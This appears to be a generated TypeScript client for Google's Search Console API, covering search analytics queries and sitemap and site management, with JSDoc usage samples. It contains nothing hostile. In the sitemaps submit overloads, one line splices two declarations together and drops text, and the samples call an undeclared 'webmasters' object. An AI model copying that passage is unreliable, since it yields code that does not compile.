interface StandardParameters {
/**
* Auth client or API Key for the request
*/
auth?:
| string
| OAuth2Client
| JWT
| Compute
| UserRefreshClient
| BaseExternalAccountClient
| GoogleAuth;
/**
* V1 error format.
*/
'$.xgafv'?: string;
/**
* OAuth access token.
*/
access_token?: string;
/**
* Data format for response.
*/
alt?: string;
/**
* JSONP
*/
callback?: string;
/**
* Selector specifying which fields to include in a partial response.
*/
fields?: string;
/**
* API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
*/
key?: string;
/**
* OAuth 2.0 token for the current user.
*/
oauth_token?: string;
/**
* Returns response with indentations and line breaks.
*/
prettyPrint?: boolean;
/**
* Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters.
*/
quotaUser?: string;
/**
* Legacy upload protocol for media (e.g. "media", "multipart").
*/
uploadType?: string;
/**
* Upload protocol for media (e.g. "raw", "multipart").
*/
upload_protocol?: string;
}
/**
* Google Search Console API
*
* The Search Console API provides access to both Search Console data (verified users only) and to public information on an URL basis (anyone)
*
* @example
* ```js
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
* ```
*/
export class Searchconsole {
context: APIRequestContext;
searchanalytics: Resource$Searchanalytics;
sitemaps: Resource$Sitemaps;
sites: Resource$Sites;
urlTestingTools: Resource$Urltestingtools;
constructor(options: GlobalOptions, google?: GoogleConfigurable) {
this.context = {
_options: options || {},
google,
};
this.searchanalytics = new Resource$Searchanalytics(this.context);
this.sitemaps = new Resource$Sitemaps(this.context);
this.sites = new Resource$Sites(this.context);
this.urlTestingTools = new Resource$Urltestingtools(this.context);
}
}
export interface Schema$ApiDataRow {
clicks?: number | null;
ctr?: number | null;
impressions?: number | null;
keys?: string[] | null;
position?: number | null;
}
/**
* A filter test to be applied to each row in the data set, where a match can return the row. Filters are string comparisons, and values and dimension names are not case-sensitive. Individual filters are either AND'ed or OR'ed within their parent filter group, according to the group's group type. You do not need to group by a specified dimension to filter against it.
*/
export interface Schema$ApiDimensionFilter {
dimension?: string | null;
expression?: string | null;
operator?: string | null;
}
/**
* A set of dimension value filters to test against each row. Only rows that pass all filter groups will be returned. All results within a filter group are either AND'ed or OR'ed together, depending on the group type selected. All filter groups are AND'ed together.
*/
export interface Schema$ApiDimensionFilterGroup {
filters?: Schema$ApiDimensionFilter[];
groupType?: string | null;
}
/**
* Blocked resource.
*/
export interface Schema$BlockedResource {
/**
* URL of the blocked resource.
*/
url?: string | null;
}
/**
* Describe image data.
*/
export interface Schema$Image {
/**
* Image data in format determined by the mime type. Currently, the format will always be "image/png", but this might change in the future.
*/
data?: string | null;
/**
* The mime-type of the image data.
*/
mimeType?: string | null;
}
/**
* Mobile-friendly issue.
*/
export interface Schema$MobileFriendlyIssue {
/**
* Rule violated.
*/
rule?: string | null;
}
/**
* Information about a resource with issue.
*/
export interface Schema$ResourceIssue {
/**
* Describes a blocked resource issue.
*/
blockedResource?: Schema$BlockedResource;
}
/**
* Mobile-friendly test request.
*/
export interface Schema$RunMobileFriendlyTestRequest {
/**
* Whether or not screenshot is requested. Default is false.
*/
requestScreenshot?: boolean | null;
/**
* URL for inspection.
*/
url?: string | null;
}
/**
* Mobile-friendly test response, including mobile-friendly issues and resource issues.
*/
export interface Schema$RunMobileFriendlyTestResponse {
/**
* Test verdict, whether the page is mobile friendly or not.
*/
mobileFriendliness?: string | null;
/**
* List of mobile-usability issues.
*/
mobileFriendlyIssues?: Schema$MobileFriendlyIssue[];
/**
* Information about embedded resources issues.
*/
resourceIssues?: Schema$ResourceIssue[];
/**
* Screenshot of the requested URL.
*/
screenshot?: Schema$Image;
/**
* Final state of the test, can be either complete or an error.
*/
testStatus?: Schema$TestStatus;
}
export interface Schema$SearchAnalyticsQueryRequest {
/**
* [Optional; Default is \"auto\"] How data is aggregated. If aggregated by property, all data for the same property is aggregated; if aggregated by page, all data is aggregated by canonical URI. If you filter or group by page, choose AUTO; otherwise you can aggregate either by property or by page, depending on how you want your data calculated; see the help documentation to learn how data is calculated differently by site versus by page. **Note:** If you group or filter by page, you cannot aggregate by property. If you specify any value other than AUTO, the aggregation type in the result will match the requested type, or if you request an invalid type, you will get an error. The API will never change your aggregation type if the requested type is invalid.
*/
aggregationType?: string | null;
/**
* The data state to be fetched, can be full or all, the latter including full and partial data.
*/
dataState?: string | null;
/**
* [Optional] Zero or more filters to apply to the dimension grouping values; for example, 'query contains \"buy\"' to see only data where the query string contains the substring \"buy\" (not case-sensitive). You can filter by a dimension without grouping by it.
*/
dimensionFilterGroups?: Schema$ApiDimensionFilterGroup[];
/**
* [Optional] Zero or more dimensions to group results by. Dimensions are the group-by values in the Search Analytics page. Dimensions are combined to create a unique row key for each row. Results are grouped in the order that you supply these dimensions.
*/
dimensions?: string[] | null;
/**
* [Required] End date of the requested date range, in YYYY-MM-DD format, in PST (UTC - 8:00). Must be greater than or equal to the start date. This value is included in the range.
*/
endDate?: string | null;
/**
* [Optional; Default is 1000] The maximum number of rows to return. Must be a number from 1 to 25,000 (inclusive).
*/
rowLimit?: number | null;
/**
* [Optional; Default is \"web\"] The search type to filter for.
*/
searchType?: string | null;
/**
* [Required] Start date of the requested date range, in YYYY-MM-DD format, in PST time (UTC - 8:00). Must be less than or equal to the end date. This value is included in the range.
*/
startDate?: string | null;
/**
* [Optional; Default is 0] Zero-based index of the first row in the response. Must be a non-negative number.
*/
startRow?: number | null;
}
/**
* A list of rows, one per result, grouped by key. Metrics in each row are aggregated for all data grouped by that key either by page or property, as specified by the aggregation type parameter.
*/
export interface Schema$SearchAnalyticsQueryResponse {
/**
* How the results were aggregated.
*/
responseAggregationType?: string | null;
/**
* A list of rows grouped by the key values in the order given in the query.
*/
rows?: Schema$ApiDataRow[];
}
/**
* List of sitemaps.
*/
export interface Schema$SitemapsListResponse {
/**
* Contains detailed information about a specific URL submitted as a [sitemap](https://support.google.com/webmasters/answer/156184).
*/
sitemap?: Schema$WmxSitemap[];
}
/**
* List of sites with access level information.
*/
export interface Schema$SitesListResponse {
/**
* Contains permission level information about a Search Console site. For more information, see [Permissions in Search Console](https://support.google.com/webmasters/answer/2451999).
*/
siteEntry?: Schema$WmxSite[];
}
/**
* Final state of the test, including error details if necessary.
*/
export interface Schema$TestStatus {
/**
* Error details if applicable.
*/
details?: string | null;
/**
* Status of the test.
*/
status?: string | null;
}
/**
* Contains permission level information about a Search Console site. For more information, see [Permissions in Search Console](https://support.google.com/webmasters/answer/2451999).
*/
export interface Schema$WmxSite {
/**
* The user's permission level for the site.
*/
permissionLevel?: string | null;
/**
* The URL of the site.
*/
siteUrl?: string | null;
}
/**
* Contains detailed information about a specific URL submitted as a [sitemap](https://support.google.com/webmasters/answer/156184).
*/
export interface Schema$WmxSitemap {
/**
* The various content types in the sitemap.
*/
contents?: Schema$WmxSitemapContent[];
/**
* Number of errors in the sitemap. These are issues with the sitemap itself that need to be fixed before it can be processed correctly.
*/
errors?: string | null;
/**
* If true, the sitemap has not been processed.
*/
isPending?: boolean | null;
/**
* If true, the sitemap is a collection of sitemaps.
*/
isSitemapsIndex?: boolean | null;
/**
* Date & time in which this sitemap was last downloaded. Date format is in RFC 3339 format (yyyy-mm-dd).
*/
lastDownloaded?: string | null;
/**
* Date & time in which this sitemap was submitted. Date format is in RFC 3339 format (yyyy-mm-dd).
*/
lastSubmitted?: string | null;
/**
* The url of the sitemap.
*/
path?: string | null;
/**
* The type of the sitemap. For example: `rssFeed`.
*/
type?: string | null;
/**
* Number of warnings for the sitemap. These are generally non-critical issues with URLs in the sitemaps.
*/
warnings?: string | null;
}
/**
* Information about the various content types in the sitemap.
*/
export interface Schema$WmxSitemapContent {
/**
* *Deprecated; do not use.*
*/
indexed?: string | null;
/**
* The number of URLs in the sitemap (of the content type).
*/
submitted?: string | null;
/**
* The specific type of content in this sitemap. For example: `web`.
*/
type?: string | null;
}
export class Resource$Searchanalytics {
context: APIRequestContext;
constructor(context: APIRequestContext) {
this.context = context;
}
/**
* Query your data with filters and parameters that you define. Returns zero or more rows grouped by the row keys that you define. You must define a date range of one or more days. When date is one of the group by values, any days without data are omitted from the result list. If you need to know which days have data, issue a broad date range query grouped by date for any metric, and see which day rows are returned.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Login into gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [
* 'https://www.googleapis.com/auth/webmasters',
* 'https://www.googleapis.com/auth/webmasters.readonly',
* ],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await webmasters.searchanalytics.query({
* // The site's URL, including protocol. For example: `http://www.example.com/`.
* siteUrl: 'placeholder-value',
*
* // Request body metadata
* requestBody: {
* // request body parameters
* // {
* // "aggregationType": "my_aggregationType",
* // "dataState": "my_dataState",
* // "dimensionFilterGroups": [],
* // "dimensions": [],
* // "endDate": "my_endDate",
* // "rowLimit": 0,
* // "searchType": "my_searchType",
* // "startDate": "my_startDate",
* // "startRow": 0
* // }
* },
* });
* console.log(res.data);
*
* // Example response
* // {
* // "responseAggregationType": "my_responseAggregationType",
* // "rows": []
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
query(
params: Params$Resource$Searchanalytics$Query,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
query(
params?: Params$Resource$Searchanalytics$Query,
options?: MethodOptions
): GaxiosPromise<Schema$SearchAnalyticsQueryResponse>;
query(
params: Params$Resource$Searchanalytics$Query,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
query(
params: Params$Resource$Searchanalytics$Query,
options:
| MethodOptions
| BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>,
callback: BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
): void;
query(
params: Params$Resource$Searchanalytics$Query,
callback: BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
): void;
query(
callback: BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
): void;
query(
paramsOrCallback?:
| Params$Resource$Searchanalytics$Query
| BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
| BodyResponseCallback<Readable>
):
| void
| GaxiosPromise<Schema$SearchAnalyticsQueryResponse>
| GaxiosPromise<Readable> {
let params = (paramsOrCallback ||
{}) as Params$Resource$Searchanalytics$Query;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Searchanalytics$Query;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (
rootUrl + '/webmasters/v3/sites/{siteUrl}/searchAnalytics/query'
).replace(/([^:]\/)\/+/g, '$1'),
method: 'POST',
},
options
),
params,
requiredParams: ['siteUrl'],
pathParams: ['siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$SearchAnalyticsQueryResponse>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$SearchAnalyticsQueryResponse>(
parameters
);
}
}
}
export interface Params$Resource$Searchanalytics$Query
extends StandardParameters {
/**
* The site's URL, including protocol. For example: `http://www.example.com/`.
*/
siteUrl?: string;
/**
* Request body metadata
*/
requestBody?: Schema$SearchAnalyticsQueryRequest;
}
export class Resource$Sitemaps {
context: APIRequestContext;
constructor(context: APIRequestContext) {
this.context = context;
}
/**
* Deletes a sitemap from this site.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Login into gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: ['https://www.googleapis.com/auth/webmasters'],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await webmasters.sitemaps.delete({
* // The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
* feedpath: 'placeholder-value',
* // The site's URL, including protocol. For example: `http://www.example.com/`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
delete(
params: Params$Resource$Sitemaps$Delete,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
delete(
params?: Params$Resource$Sitemaps$Delete,
options?: MethodOptions
): GaxiosPromise<void>;
delete(
params: Params$Resource$Sitemaps$Delete,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
delete(
params: Params$Resource$Sitemaps$Delete,
options: MethodOptions | BodyResponseCallback<void>,
callback: BodyResponseCallback<void>
): void;
delete(
params: Params$Resource$Sitemaps$Delete,
callback: BodyResponseCallback<void>
): void;
delete(callback: BodyResponseCallback<void>): void;
delete(
paramsOrCallback?:
| Params$Resource$Sitemaps$Delete
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
callback?: BodyResponseCallback<void> | BodyResponseCallback<Readable>
): void | GaxiosPromise<void> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sitemaps$Delete;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sitemaps$Delete;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (
rootUrl + '/webmasters/v3/sites/{siteUrl}/sitemaps/{feedpath}'
).replace(/([^:]\/)\/+/g, '$1'),
method: 'DELETE',
},
options
),
params,
requiredParams: ['siteUrl', 'feedpath'],
pathParams: ['feedpath', 'siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<void>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<void>(parameters);
}
}
/**
* Retrieves information about a specific sitemap.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Login into gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [
* 'https://www.googleapis.com/auth/webmasters',
* 'https://www.googleapis.com/auth/webmasters.readonly',
* ],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await webmasters.sitemaps.get({
* // The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
* feedpath: 'placeholder-value',
* // The site's URL, including protocol. For example: `http://www.example.com/`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
*
* // Example response
* // {
* // "contents": [],
* // "errors": "my_errors",
* // "isPending": false,
* // "isSitemapsIndex": false,
* // "lastDownloaded": "my_lastDownloaded",
* // "lastSubmitted": "my_lastSubmitted",
* // "path": "my_path",
* // "type": "my_type",
* // "warnings": "my_warnings"
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
get(
params: Params$Resource$Sitemaps$Get,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
get(
params?: Params$Resource$Sitemaps$Get,
options?: MethodOptions
): GaxiosPromise<Schema$WmxSitemap>;
get(
params: Params$Resource$Sitemaps$Get,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
get(
params: Params$Resource$Sitemaps$Get,
options: MethodOptions | BodyResponseCallback<Schema$WmxSitemap>,
callback: BodyResponseCallback<Schema$WmxSitemap>
): void;
get(
params: Params$Resource$Sitemaps$Get,
callback: BodyResponseCallback<Schema$WmxSitemap>
): void;
get(callback: BodyResponseCallback<Schema$WmxSitemap>): void;
get(
paramsOrCallback?:
| Params$Resource$Sitemaps$Get
| BodyResponseCallback<Schema$WmxSitemap>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$WmxSitemap>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$WmxSitemap>
| BodyResponseCallback<Readable>
): void | GaxiosPromise<Schema$WmxSitemap> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sitemaps$Get;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sitemaps$Get;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (
rootUrl + '/webmasters/v3/sites/{siteUrl}/sitemaps/{feedpath}'
).replace(/([^:]\/)\/+/g, '$1'),
method: 'GET',
},
options
),
params,
requiredParams: ['siteUrl', 'feedpath'],
pathParams: ['feedpath', 'siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$WmxSitemap>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$WmxSitemap>(parameters);
}
}
/**
* Lists the [sitemaps-entries](/webmaster-tools/v3/sitemaps) submitted for this site, or included in the sitemap index file (if `sitemapIndex` is specified in the request).
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Login into gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [
* 'https://www.googleapis.com/auth/webmasters',
* 'https://www.googleapis.com/auth/webmasters.readonly',
* ],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await webmasters.sitemaps.list({
* // A URL of a site's sitemap index. For example: `http://www.example.com/sitemapindex.xml`.
* sitemapIndex: 'placeholder-value',
* // The site's URL, including protocol. For example: `http://www.example.com/`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
*
* // Example response
* // {
* // "sitemap": []
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
list(
params: Params$Resource$Sitemaps$List,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
list(
params?: Params$Resource$Sitemaps$List,
options?: MethodOptions
): GaxiosPromise<Schema$SitemapsListResponse>;
list(
params: Params$Resource$Sitemaps$List,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
list(
params: Params$Resource$Sitemaps$List,
options:
| MethodOptions
| BodyResponseCallback<Schema$SitemapsListResponse>,
callback: BodyResponseCallback<Schema$SitemapsListResponse>
): void;
list(
params: Params$Resource$Sitemaps$List,
callback: BodyResponseCallback<Schema$SitemapsListResponse>
): void;
list(callback: BodyResponseCallback<Schema$SitemapsListResponse>): void;
list(
paramsOrCallback?:
| Params$Resource$Sitemaps$List
| BodyResponseCallback<Schema$SitemapsListResponse>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$SitemapsListResponse>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$SitemapsListResponse>
| BodyResponseCallback<Readable>
):
| void
| GaxiosPromise<Schema$SitemapsListResponse>
| GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sitemaps$List;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sitemaps$List;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (rootUrl + '/webmasters/v3/sites/{siteUrl}/sitemaps').replace(
/([^:]\/)\/+/g,
'$1'
),
method: 'GET',
},
options
),
params,
requiredParams: ['siteUrl'],
pathParams: ['siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$SitemapsListResponse>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$SitemapsListResponse>(parameters);
}
}
/**
* Submits a sitemap for a site.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Login into gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: ['https://www.googleapis.com/auth/webmasters'],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await webmasters.sitemaps.submit({
* // The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
* feedpath: 'placeholder-value',
* // The site's URL, including protocol. For example: `http://www.example.com/`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
submit(
params: Params$Resource$Sitemaps$Submit,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
submit(
params?: Params$Resource$Sitemaps$Submit,
options?: MethodOptions
): GaxiosPromise<void>;
submit(
params: Params$Resource$Sitemaps$Submit,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
submit(
params: Params$Resource$Sitemaps$Submit,
options: MethodOptions | BodyResponseCallback<void>,
callback: BodyResponseCallback<void>
): void;
submit(
params: Params$Resource$Sitemaps$Submit, | submit(callback: BodyResponseCallback<void>): void;
submit(
paramsOrCallback?:
| Params$Resource$Sitemaps$Submit
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
callback?: BodyResponseCallback<void> | BodyResponseCallback<Readable>
): void | GaxiosPromise<void> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sitemaps$Submit;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sitemaps$Submit;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (
rootUrl + '/webmasters/v3/sites/{siteUrl}/sitemaps/{feedpath}'
).replace(/([^:]\/)\/+/g, '$1'),
method: 'PUT',
},
options
),
params,
requiredParams: ['siteUrl', 'feedpath'],
pathParams: ['feedpath', 'siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<void>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<void>(parameters);
}
}
}
export interface Params$Resource$Sitemaps$Delete extends StandardParameters {
/**
* The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
*/
feedpath?: string;
/**
* The site's URL, including protocol. For example: `http://www.example.com/`.
*/
siteUrl?: string;
}
export interface Params$Resource$Sitemaps$Get extends StandardParameters {
/**
* The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
*/
feedpath?: string;
/**
* The site's URL, including protocol. For example: `http://www.example.com/`.
*/
siteUrl?: string;
}
export interface Params$Resource$Sitemaps$List extends StandardParameters {
/**
* A URL of a site's sitemap index. For example: `http://www.example.com/sitemapindex.xml`.
*/
sitemapIndex?: string;
/**
* The site's URL, including protocol. For example: `http://www.example.com/`.
*/
siteUrl?: string;
}
export interface Params$Resource$Sitemaps$Submit extends StandardParameters {
/**
* The URL of the actual sitemap. For example: `http://www.example.com/sitemap.xml`.
*/
feedpath?: string;
/**
* The site's URL, including protocol. For example: `http://www.example.com/`.
*/
siteUrl?: string;
}
export class Resource$Sites {
context: APIRequestContext;
constructor(context: APIRequestContext) {
this.context = context;
}
/**
* Adds a site to the set of the user's sites in Search Console.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Login into gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: ['https://www.googleapis.com/auth/webmasters'],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await webmasters.sites.add({
* // The URL of the site to add.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
add(
params: Params$Resource$Sites$Add,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
add(
params?: Params$Resource$Sites$Add,
options?: MethodOptions
): GaxiosPromise<void>;
add(
params: Params$Resource$Sites$Add,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
add(
params: Params$Resource$Sites$Add,
options: MethodOptions | BodyResponseCallback<void>,
callback: BodyResponseCallback<void>
): void;
add(
params: Params$Resource$Sites$Add,
callback: BodyResponseCallback<void>
): void;
add(callback: BodyResponseCallback<void>): void;
add(
paramsOrCallback?:
| Params$Resource$Sites$Add
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
callback?: BodyResponseCallback<void> | BodyResponseCallback<Readable>
): void | GaxiosPromise<void> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sites$Add;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sites$Add;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (rootUrl + '/webmasters/v3/sites/{siteUrl}').replace(
/([^:]\/)\/+/g,
'$1'
),
method: 'PUT',
},
options
),
params,
requiredParams: ['siteUrl'],
pathParams: ['siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<void>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<void>(parameters);
}
}
/**
* Removes a site from the set of the user's Search Console sites.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Login into gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: ['https://www.googleapis.com/auth/webmasters'],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await webmasters.sites.delete({
